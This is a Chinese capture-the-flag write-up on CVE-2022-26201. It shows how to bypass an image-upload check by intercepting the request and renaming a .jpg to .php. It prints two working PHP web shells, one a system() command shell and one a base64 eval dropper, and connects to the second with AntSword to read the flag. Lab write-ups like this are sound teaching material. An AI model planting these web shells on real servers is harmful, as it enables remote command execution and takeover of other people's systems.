自学内容网 自学内容网

CVE-2022-26201

打开是这么个页面

左上角找到Admin访问

里面有个Add Users,访问一下,能创建用户,有个能上传图片的地方

普通的一句话木马无法访问flag,需要创建一个权限马

<?php system($_GET[1]);phpinfo();?>

因为只能上传jpg形式的文件,所以更改文件后缀名为jpg

使用bp抓包,更改后缀为php,使用重放器发送

上传成功

访问img/上传的php文件名 /flag,得到flag:flag{a71683b4-9a2d-4288-b8f3-25d10816b1c0}

第二种方法使用蚁剑马连接

一句话木马是有防护的,所以我们要利用php和base64来构造一个特殊马来进行连接:

base64先对一句话木马加密<?php @eval($_POST['a']);?>

木马内容:

<?php

file_put_contents('shell.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydhJ10pOz8+'));

?>

然后跟上边一样bp抓包改包,重放器发送

生成shell.php文件,木马是以base64的形式。

蚁剑路径为img/shell.php,编码器为base6,根目录下找到flag


原文地址:https://blog.csdn.net/zarbb/article/details/144010391

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!